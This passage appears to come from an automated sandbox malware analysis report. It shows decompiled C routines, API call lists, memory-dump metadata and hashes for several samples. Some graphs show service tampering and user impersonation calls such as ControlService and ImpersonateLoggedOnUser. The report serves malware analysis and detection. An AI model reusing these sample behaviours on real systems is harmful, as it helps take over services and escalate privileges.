                                                                      								if(__eflags < 0) {
                                                                      									_t48 = _t100 + 0xc;
                                                                      									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                      									__eflags =  *_t48;
                                                                      									goto L34;
                                                                      								}
                                                                      								_t99 = _t81;
                                                                      								__eflags = _t81 - _t78;
                                                                      								if(_t81 >= _t78) {
                                                                      									_t99 = _t78;
                                                                      								}
                                                                      								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                      								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                      								 *_t100 =  *_t100 + _t99;
                                                                      								_t101 = _t101 + 0xc;
                                                                      								_t81 = _t81 - _t99;
                                                                      								_v8 = _v8 + _t99;
                                                                      								goto L27;
                                                                      								L31:
                                                                      								__eflags = _t81;
                                                                      							} while (_t81 != 0);
                                                                      							goto L32;
                                                                      						}
                                                                      					}
                                                                      					L3:
                                                                      					_t61 = E0040BFC1(_t105);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					 *_t61 = 0x16;
                                                                      					E0040E744(_t90, 0, _t100);
                                                                      					goto L4;
                                                                      				}
                                                                      			}





























                                                                      0x0040bb5d
                                                                      0x0040bb5f
                                                                      0x00000000
                                                                      0x0040bbe1
                                                                      0x0040bbe1
                                                                      0x0040bbe1
                                                                      0x00000000
                                                                      0x0040bb2a
                                                                      0x0040bb24
                                                                      0x0040bac8
                                                                      0x0040bac8
                                                                      0x0040bacd
                                                                      0x0040bace
                                                                      0x0040bacf
                                                                      0x0040bad0
                                                                      0x0040bad1
                                                                      0x0040bad2
                                                                      0x0040bad8
                                                                      0x00000000
                                                                      0x0040badd

                                                                      APIs
                                                                      • __flush.LIBCMT ref: 0040BB6E
                                                                      • __fileno.LIBCMT ref: 0040BB8E
                                                                      • __locking.LIBCMT ref: 0040BB95
                                                                      • __flsbuf.LIBCMT ref: 0040BBC0
                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                      • String ID:
                                                                      • API String ID: 3240763771-0
                                                                      • Opcode ID: 5ae6f52eb953361433d7ea32021fe6e8a7002ad97f6d3a8caf392525720eb222
                                                                      • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                      • Opcode Fuzzy Hash: 5ae6f52eb953361433d7ea32021fe6e8a7002ad97f6d3a8caf392525720eb222
                                                                      • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 005C553A
                                                                      • __isleadbyte_l.LIBCMT ref: 005C556E
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 005C559F
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 005C560D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                      • String ID:
                                                                      • API String ID: 3058430110-0
                                                                      • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                      • Instruction ID: cf1f3e8774af0f3fc381f8198ea3ff65c0a89f1032b816ae49911e186a64cc51
                                                                      • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                      • Instruction Fuzzy Hash: FC317C31A10686AFDB20DFE4D884EBE7FA6BF01310B18856DE5658B1A1F730E980DB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                      				char _v8;
                                                                      				signed int _v12;
                                                                      				char _v20;
                                                                      				char _t43;
                                                                      				char _t46;
                                                                      				signed int _t53;
                                                                      				signed int _t54;
                                                                      				intOrPtr _t56;
                                                                      				int _t57;
                                                                      				int _t58;
                                                                      				signed short* _t59;
                                                                      				short* _t60;
                                                                      				int _t65;
                                                                      				char* _t72;
                                                                      
                                                                      				_t72 = _a8;
                                                                      				if(_t72 == 0 || _a12 == 0) {
                                                                      					L5:
                                                                      					return 0;
                                                                      				} else {
                                                                      					if( *_t72 != 0) {
                                                                      						E0040EC86( &_v20, _a16);
                                                                      						_t43 = _v20;
                                                                      						__eflags =  *(_t43 + 0x14);
                                                                      						if( *(_t43 + 0x14) != 0) {
                                                                      							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                                      							__eflags = _t46;
                                                                      							if(_t46 == 0) {
                                                                      								__eflags = _a4;
                                                                      								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                      								if(__eflags != 0) {
                                                                      									L10:
                                                                      									__eflags = _v8;
                                                                      									if(_v8 != 0) {
                                                                      										_t53 = _v12;
                                                                      										_t11 = _t53 + 0x70;
                                                                      										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                      										__eflags =  *_t11;
                                                                      									}
                                                                      									return 1;
                                                                      								}
                                                                      								L21:
                                                                      								_t54 = E0040BFC1(__eflags);
                                                                      								 *_t54 = 0x2a;
                                                                      								__eflags = _v8;
                                                                      								if(_v8 != 0) {
                                                                      									_t54 = _v12;
                                                                      									_t33 = _t54 + 0x70;
                                                                      									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                      									__eflags =  *_t33;
                                                                      								}
                                                                      								return _t54 | 0xffffffff;
                                                                      							}
                                                                      							_t56 = _v20;
                                                                      							_t65 =  *(_t56 + 0xac);
                                                                      							__eflags = _t65 - 1;
                                                                      							if(_t65 <= 1) {
                                                                      								L17:
                                                                      								__eflags = _a12 -  *(_t56 + 0xac);
                                                                      								if(__eflags < 0) {
                                                                      									goto L21;
                                                                      								}
                                                                      								__eflags = _t72[1];
                                                                      								if(__eflags == 0) {
                                                                      									goto L21;
                                                                      								}
                                                                      								L19:
                                                                      								_t57 =  *(_t56 + 0xac);
                                                                      								__eflags = _v8;
                                                                      								if(_v8 == 0) {
                                                                      									return _t57;
                                                                      								}
                                                                      								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                      								return _t57;
                                                                      							}
                                                                      							__eflags = _a12 - _t65;
                                                                      							if(_a12 < _t65) {
                                                                      								goto L17;
                                                                      							}
                                                                      							__eflags = _a4;
                                                                      							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                      							__eflags = _t58;
                                                                      							_t56 = _v20;
                                                                      							if(_t58 != 0) {
                                                                      								goto L19;
                                                                      							}
                                                                      							goto L17;
                                                                      						}
                                                                      						_t59 = _a4;
                                                                      						__eflags = _t59;
                                                                      						if(_t59 != 0) {
                                                                      							 *_t59 =  *_t72 & 0x000000ff;
                                                                      						}
                                                                      						goto L10;
                                                                      					} else {
                                                                      						_t60 = _a4;
                                                                      						if(_t60 != 0) {
                                                                      							 *_t60 = 0;
                                                                      						}
                                                                      						goto L5;
                                                                      					}
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                      • __isleadbyte_l.LIBCMT ref: 00415307
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                      • String ID:
                                                                      • API String ID: 3058430110-0
                                                                      • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                      • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                      • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                      • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                      • String ID:
                                                                      • API String ID: 3016257755-0
                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                      • Instruction ID: ac1f15453c655125f3d335d89e3834493cfb741c27c87bd46a31552bbcfef14d
                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                      • Instruction Fuzzy Hash: C7114BB200014EBFCF125EC5DC49DEE3FA2FB58354B588519FA2859131E637CAB1AB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                      				intOrPtr _t25;
                                                                      				void* _t26;
                                                                      				void* _t28;
                                                                      
                                                                      				_t25 = _a16;
                                                                      				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                      					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                      					goto L9;
                                                                      				} else {
                                                                      					_t34 = _t25 - 0x66;
                                                                      					if(_t25 != 0x66) {
                                                                      						__eflags = _t25 - 0x61;
                                                                      						if(_t25 == 0x61) {
                                                                      							L7:
                                                                      							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                      						} else {
                                                                      							__eflags = _t25 - 0x41;
                                                                      							if(__eflags == 0) {
                                                                      								goto L7;
                                                                      							} else {
                                                                      								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                      							}
                                                                      						}
                                                                      						L9:
                                                                      						return _t26;
                                                                      					} else {
                                                                      						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                      					}
                                                                      				}
                                                                      			}







                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                      • String ID:
                                                                      • API String ID: 3016257755-0
                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                      • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                      • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:54.2%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:31
                                                                      Total number of Limit Nodes:2

                                                                      Callgraph

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.400223703.00007FFBAFD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAFD50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_7ffbafd50000_nika.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeConfigService
                                                                      • String ID:
                                                                      • API String ID: 3849694230-0
                                                                      • Opcode ID: 68759dd24562f89bc8c60e7e1dcff7698ae75f9a125f3402cc0351d71fe92a17
                                                                      • Instruction ID: 2337e443f78e618980b5362d0e817694014626dbdf8b2d4cce92ea47af82b7d6
                                                                      • Opcode Fuzzy Hash: 68759dd24562f89bc8c60e7e1dcff7698ae75f9a125f3402cc0351d71fe92a17
                                                                      • Instruction Fuzzy Hash: 2BF1B470A18A4E4FEB69EE28C8467F977D1FB54311F10426EDC9EC7281DE74A5818B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.400223703.00007FFBAFD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAFD50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_7ffbafd50000_nika.jbxd
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID:
                                                                      • API String ID: 2645101109-0
                                                                      • Opcode ID: 0f9a7d583ec1eca681f74a1e3c941a1f2db55dfa1810749686399c1358b4f22b
                                                                      • Instruction ID: 28ca77df6a6807a9930e1440a760443326b1c17fcb937fc811a11eb58e683e40
                                                                      • Opcode Fuzzy Hash: 0f9a7d583ec1eca681f74a1e3c941a1f2db55dfa1810749686399c1358b4f22b
                                                                      • Instruction Fuzzy Hash: 38916F70608A4D8FEBA9EF28C8597E97B91EB54311F00417ED88DC7292CE75A981CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 121 7ffbafd50c34-7ffbafd50c3b 122 7ffbafd50c3d-7ffbafd50c45 121->122 123 7ffbafd50c46-7ffbafd50ce5 121->123 122->123 128 7ffbafd50d40-7ffbafd50daa OpenServiceA 123->128 129 7ffbafd50ce7-7ffbafd50cf6 123->129 134 7ffbafd50db2-7ffbafd50de6 call 7ffbafd50e02 128->134 135 7ffbafd50dac 128->135 129->128 130 7ffbafd50cf8-7ffbafd50cfb 129->130 132 7ffbafd50cfd-7ffbafd50d10 130->132 133 7ffbafd50d35-7ffbafd50d3d 130->133 136 7ffbafd50d12 132->136 137 7ffbafd50d14-7ffbafd50d27 132->137 133->128 142 7ffbafd50ded-7ffbafd50e01 134->142 143 7ffbafd50de8 134->143 135->134 136->137 137->137 138 7ffbafd50d29-7ffbafd50d31 137->138 138->133 143->142
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.400223703.00007FFBAFD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAFD50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_7ffbafd50000_nika.jbxd
                                                                      Similarity
                                                                      • API ID: OpenService
                                                                      • String ID:
                                                                      • API String ID: 3098006287-0
                                                                      • Opcode ID: 7d07b2c48197868903858cf120fd0195750c69f452db804631259a123840e7ce
                                                                      • Instruction ID: af0fcfaa49f0cbe43b67a75e647a11af71bebf67f180ae51784c3428d3d06875
                                                                      • Opcode Fuzzy Hash: 7d07b2c48197868903858cf120fd0195750c69f452db804631259a123840e7ce
                                                                      • Instruction Fuzzy Hash: 8151B670A08A4D4FEB59EF28C84A7F977D1FB59311F10426EE89DC3292DE74A841CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 144 7ffbafd5108a-7ffbafd510b3 145 7ffbafd510be-7ffbafd51152 FindCloseChangeNotification 144->145 146 7ffbafd510b5-7ffbafd510bd 144->146 150 7ffbafd5115a-7ffbafd51181 145->150 151 7ffbafd51154 145->151 146->145 151->150
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.400223703.00007FFBAFD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAFD50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_7ffbafd50000_nika.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      • Opcode ID: 7a6ec3f9e2c247e41a9204d60c4fcf915b8c81e7ca278c5bfac9bc9567586214
                                                                      • Instruction ID: 5b2206c7a24b30e4cb5c8534ae5444ff95941bb15dfc4ffea44eb3ee5baf91c7
                                                                      • Opcode Fuzzy Hash: 7a6ec3f9e2c247e41a9204d60c4fcf915b8c81e7ca278c5bfac9bc9567586214
                                                                      • Instruction Fuzzy Hash: F731F63090CB8C4FDB0ADB7888157E97FF0EF56321F04429FD089C31A2DA696456CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 152 7ffbafd50b4b-7ffbafd50bb8 156 7ffbafd50bc2-7ffbafd50bc7 152->156 157 7ffbafd50bba-7ffbafd50bbf 152->157 158 7ffbafd50bd1-7ffbafd50c08 OpenSCManagerW 156->158 159 7ffbafd50bc9-7ffbafd50bce 156->159 157->156 160 7ffbafd50c10-7ffbafd50c2d 158->160 161 7ffbafd50c0a 158->161 159->158 161->160
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.400223703.00007FFBAFD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAFD50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_7ffbafd50000_nika.jbxd
                                                                      Similarity
                                                                      • API ID: ManagerOpen
                                                                      • String ID:
                                                                      • API String ID: 1889721586-0
                                                                      • Opcode ID: e636076e1c2de0953c268ef612b3dcf0cacc4a9f652f8c5c5b63a7e2d65113ae
                                                                      • Instruction ID: beed67f9ae72b4a7b90c72c4eb2c19d7bec9cd8f076e7a5171586e014aadb24d
                                                                      • Opcode Fuzzy Hash: e636076e1c2de0953c268ef612b3dcf0cacc4a9f652f8c5c5b63a7e2d65113ae
                                                                      • Instruction Fuzzy Hash: 0F317E71908B1C8FDB69DF98D8896F9BBE0EB69312F00412FD48AD3651DE706445CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 162 7ffbafd51a3b-7ffbafd51ad9 ControlService 166 7ffbafd51ae1-7ffbafd51b09 162->166 167 7ffbafd51adb 162->167 167->166
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.400223703.00007FFBAFD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAFD50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_7ffbafd50000_nika.jbxd
                                                                      Similarity
                                                                      • API ID: ControlService
                                                                      • String ID:
                                                                      • API String ID: 253159669-0
                                                                      • Opcode ID: 705a0f78e6ee4a91d5abbbf6bd005019735ad35248e9d1dfc3ff997337fcf8ea
                                                                      • Instruction ID: 56a51a378cac86b001eea1fe900d91a13f522010afc6437056a4952524f5f122
                                                                      • Opcode Fuzzy Hash: 705a0f78e6ee4a91d5abbbf6bd005019735ad35248e9d1dfc3ff997337fcf8ea
                                                                      • Instruction Fuzzy Hash: 2D31B171A0CB1C8FDB18DF9CD845AF97BE1EB65721F00412FE08AD3252CB64A846CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 168 7ffbafd50108-7ffbafd50114 170 7ffbafd5012b-7ffbafd51802 ImpersonateLoggedOnUser 168->170 171 7ffbafd50116 168->171 175 7ffbafd5180a-7ffbafd51831 170->175 176 7ffbafd51804 170->176 171->170 176->175
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.400223703.00007FFBAFD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAFD50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_7ffbafd50000_nika.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4c0379d93d60dcedc2f6133869d0fadf4dbdfa74309fc04d3bca5b7f90699289
                                                                      • Instruction ID: 5d74dc4fb315f8e2c75977804d70f30653a90f4ef8f010923e2c9e2498624b04
                                                                      • Opcode Fuzzy Hash: 4c0379d93d60dcedc2f6133869d0fadf4dbdfa74309fc04d3bca5b7f90699289
                                                                      • Instruction Fuzzy Hash: 6821D571A0CA0D9FDB59DF68C845BF9BBE0FB55321F00412ED08ED3192DB64A856CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 177 7ffbafd5176e-7ffbafd517c5 180 7ffbafd517cd-7ffbafd51802 ImpersonateLoggedOnUser 177->180 181 7ffbafd5180a-7ffbafd51831 180->181 182 7ffbafd51804 180->182 182->181
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.400223703.00007FFBAFD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAFD50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_7ffbafd50000_nika.jbxd
                                                                      Similarity
                                                                      • API ID: ImpersonateLoggedUser
                                                                      • String ID:
                                                                      • API String ID: 2216092060-0
                                                                      • Opcode ID: 12276837d4ac4088b6764640e93a4dfa6c1ee08f43bd2057f9c8ef098324caba
                                                                      • Instruction ID: 7c1d1c0b7606e6509a00e6e9dad7b5aa958e75187cc59b9f08d36aaf7309acb1
                                                                      • Opcode Fuzzy Hash: 12276837d4ac4088b6764640e93a4dfa6c1ee08f43bd2057f9c8ef098324caba
                                                                      • Instruction Fuzzy Hash: 3B21D23190CA0C8FDB58DFA8C805BF9BBE0FB55321F00426FD049D3592CB64A856CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(011EE000,?,011EA9A0,011EAF26,?,011EE000,011EAF26,011EE000), ref: 011EA9C3
                                                                      • TerminateProcess.KERNEL32(00000000,?,011EA9A0,011EAF26,?,011EE000,011EAF26,011EE000), ref: 011EA9CA
                                                                      • ExitProcess.KERNEL32 ref: 011EA9DC
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: ec3eb559d07c4be2411e0ae9f2e539e7ad488c4d4947ef9a9f8ff9b3adb8d085
                                                                      • Instruction ID: cd094c35a923f760cf078fb47c2acc41d7a4179027f7b9914cf9debb452fe6fd
                                                                      • Opcode Fuzzy Hash: ec3eb559d07c4be2411e0ae9f2e539e7ad488c4d4947ef9a9f8ff9b3adb8d085
                                                                      • Instruction Fuzzy Hash: A4E0B635005908AFCB2A6B99E80CA993BA9EF51241F164829F91687131DB35EDC1DBD2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 011F2368: CreateFileW.KERNELBASE(00000000,00000000,?,011F2758,?,?,00000000,?,011F2758,00000000,0000000C), ref: 011F2385
                                                                      • GetLastError.KERNEL32 ref: 011F27C3
                                                                      • __dosmaperr.LIBCMT ref: 011F27CA
                                                                      • GetFileType.KERNELBASE(00000000), ref: 011F27D6
                                                                      • GetLastError.KERNEL32 ref: 011F27E0
                                                                      • __dosmaperr.LIBCMT ref: 011F27E9
                                                                      • CloseHandle.KERNEL32(00000000), ref: 011F2809
                                                                      • CloseHandle.KERNEL32(011ED4F0), ref: 011F2956
                                                                      • GetLastError.KERNEL32 ref: 011F2988
                                                                      • __dosmaperr.LIBCMT ref: 011F298F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                      • String ID: H
                                                                      • API String ID: 4237864984-2852464175
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (first node 69: 11d9c30-11d9cba)
                                                                      APIs
                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 011D9C90
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PathTemp
                                                                      • String ID:
                                                                      • API String ID: 2920410445-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (first node 191: 11d3ff0-11d4050)
                                                                      APIs
                                                                      • Sleep.KERNEL32(000003E8), ref: 011D42B9
                                                                      • SetCurrentDirectoryA.KERNEL32(00000000,9BC7B195), ref: 011D4364
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
